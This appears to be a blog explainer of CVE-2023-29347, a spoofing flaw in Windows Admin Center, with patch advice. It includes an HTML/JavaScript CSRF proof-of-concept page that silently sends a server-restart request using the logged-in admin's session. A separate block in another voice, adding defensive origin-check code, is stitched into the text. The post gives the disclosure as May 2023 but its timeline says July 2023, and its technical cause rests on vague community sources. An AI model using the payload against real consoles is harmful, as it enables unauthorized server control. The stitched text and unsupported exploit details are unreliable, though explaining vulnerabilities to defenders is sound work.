In May 2023, Microsoft disclosed a security flaw in Windows Admin Center, identified as CVE-2023-29347. This vulnerability could let an attacker spoof authentication in Windows Admin Center, a web-based platform often used by system administrators to manage Windows servers and clusters.

In this post, we’ll explain what this vulnerability is, why it matters, show you a simple code example demonstrating the risk, look at how attackers could exploit it, and finally provide links to Microsoft’s original advisory and patches.

What is Windows Admin Center?

Windows Admin Center (WAC) is a web application that helps IT admins manage local and remote Windows servers through a browser. You can install it on your server, and then connect using HTTPS from your admin workstation.

Because WAC gives access to many server management features, securing it is critical. If an attacker gets in, they could control your servers.

What is CVE-2023-29347?

CVE-2023-29347 is a spoofing vulnerability in Windows Admin Center. Microsoft summarizes it as:

> *A spoofing vulnerability exists in Windows Admin Center when it improperly handles certain requests.*
>
> Source: Microsoft Security Advisory

Spoofing means making something look like it comes from a trusted source when it does not.

Impact

- An attacker could trick a Windows Admin Center admin into believing a malicious request or session is legitimate.
- This could help them steal session tokens, or make a targeted *phishing* attack more convincing.
- Ultimately, successful attacks could lead to elevation of privilege or compromise of your server.

Technical Details: What Was Wrong?

Microsoft’s advisory is light on detail, but through posts from the security community (see references below), we know this issue exists due to insufficient request validation in Windows Admin Center.

Core Issues

1. Insufficient validation: Certain endpoints in WAC did not correctly validate the origin and content of incoming HTTP requests.
2. Cross-Site Request Forgery (CSRF): The attacker’s page silently sends crafted requests to WAC running at, say, https://server.domain:6516/.
3. Spoofing: Because WAC isn’t checking the request’s “origin” or properly authenticating some requests, the attacker’s spoofed request is accepted.
4. Consequences: The attacker might steal a session token, alter configuration, or get control, depending on the admin’s session privileges and what endpoints are exposed.

Example Exploit: CSRF PoC Snippet

Below is a simple code snippet that an attacker could use to exploit this vulnerability with a CSRF attack. This is meant for educational purposes only.

Imagine you are an admin, logged into WAC at https://server.domain:6516/. The attacker sends you to their crafted web page:

```html
<!-- WARNING: FOR EDUCATIONAL DEMONSTRATION ONLY -->

<html>
  <body>
    <h1>Nothing to see here...</h1>
    <script>
      // This script sends a POST request to WAC using the admin's session
      fetch('https://server.domain:6516/api/servers/restart', {
        method: 'POST',
        credentials: 'include', // Use logged-in admin's cookie/session
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({serverName: "Server01"})
      })
      .then(response => {
        if (response.ok) {
          alert("Exploit successful: Server restart triggered!");
        } else {
          alert("Exploit failed.");
        }
      });
    </script>
  </body>
</html>
```

Because of the spoofing flaw, WAC might accept and process the request as if it were coming from you. The attacker’s code could then do almost anything the admin is allowed to do (restart servers, add users, etc.).
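As an added example (not code from this post or from Windows Admin Center), here is the kind of server-side origin check whose absence the post describes: it rejects the cross-site POST sent by the page above while passing the console’s own requests, and it is the logic a reverse proxy or audit hook in front of an admin tool should apply. The names `checkRequestOrigin`, `auditRequests` and `ALLOWED_ORIGIN` are assumed, and the sample requests are constructed.

```javascript
// Added example, not code from the original post or from Windows Admin Center.
// Names below are hypothetical; the request samples are constructed.

const STATE_CHANGING = new Set(['POST', 'PUT', 'PATCH', 'DELETE']);

// Origin of the admin console itself (assumed; matches the URL used in the post).
const ALLOWED_ORIGIN = 'https://server.domain:6516';

// Extract the origin from a Referer header, or undefined if absent or malformed.
function originFromReferer(referer) {
  try { return referer ? new URL(referer).origin : undefined; } catch { return undefined; }
}

// Decide whether a request may proceed. `req` is { method, headers } with
// lower-cased header names, as Node's http module exposes them.
function checkRequestOrigin(req, allowedOrigin = ALLOWED_ORIGIN) {
  const method = req.method.toUpperCase();
  if (!STATE_CHANGING.has(method)) {
    return { allowed: true, reason: 'safe method, no CSRF risk' };
  }
  const h = req.headers;
  // Sec-Fetch-Site is set by the browser and cannot be overridden by page script.
  const site = h['sec-fetch-site'];
  if (site && site !== 'same-origin' && site !== 'none') {
    return { allowed: false, reason: `cross-site request (Sec-Fetch-Site=${site})` };
  }
  // Origin is also browser-controlled; fall back to Referer for older clients.
  const origin = h['origin'] || originFromReferer(h['referer']);
  if (!origin) {
    return { allowed: false, reason: 'state-changing request without Origin or Referer' };
  }
  if (origin !== allowedOrigin) {
    return { allowed: false, reason: `origin ${origin} does not match ${allowedOrigin}` };
  }
  return { allowed: true, reason: 'same-origin request' };
}

// Constructed samples: the CSRF page above, a legitimate console request,
// an older client sending only Referer, and a harmless GET.
const SAMPLE_REQUESTS = [
  { method: 'POST', headers: { origin: 'https://attacker.example', 'sec-fetch-site': 'cross-site', 'content-type': 'application/json' } },
  { method: 'POST', headers: { origin: 'https://server.domain:6516', 'sec-fetch-site': 'same-origin', 'content-type': 'application/json' } },
  { method: 'POST', headers: { referer: 'https://server.domain:6516/servers/Server01' } },
  { method: 'GET', headers: { origin: 'https://attacker.example' } },
];

// Decisions for a batch of requests; the rejected ones are what an audit log or WAF should surface.
function auditRequests(requests) {
  return requests.map((req) => checkRequestOrigin(req));
}
```

A CSRF token or `SameSite` session cookie adds a second, independent layer; the header check alone also turns every cross-site attempt into a loggable event, which is the detection value.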

Patch Windows Admin Center

Microsoft has patched this vulnerability. Go to the Security Update Guide and download the latest version of Windows Admin Center.

See the official release notes for updates and fixes.

Additional References

- Microsoft Security Update Guide: CVE-2023-29347
- Microsoft Docs – Windows Admin Center
- Security community discussion on the impact
- Windows Admin Center Release Notes

Conclusion

CVE-2023-29347 highlights the risk of spoofing attacks in web-based admin tools. If you use Windows Admin Center, update it immediately. Always apply the latest patches, and don’t expose powerful tools like WAC to the open internet.

Stay vigilant. If you’d like to test your environment or talk to your security team about this vulnerability, use the code and resources above as a starting point.

Timeline

Published on: 07/11/2023 18:15:00 UTC
Last modified on: 07/13/2023 19:42:00 UTC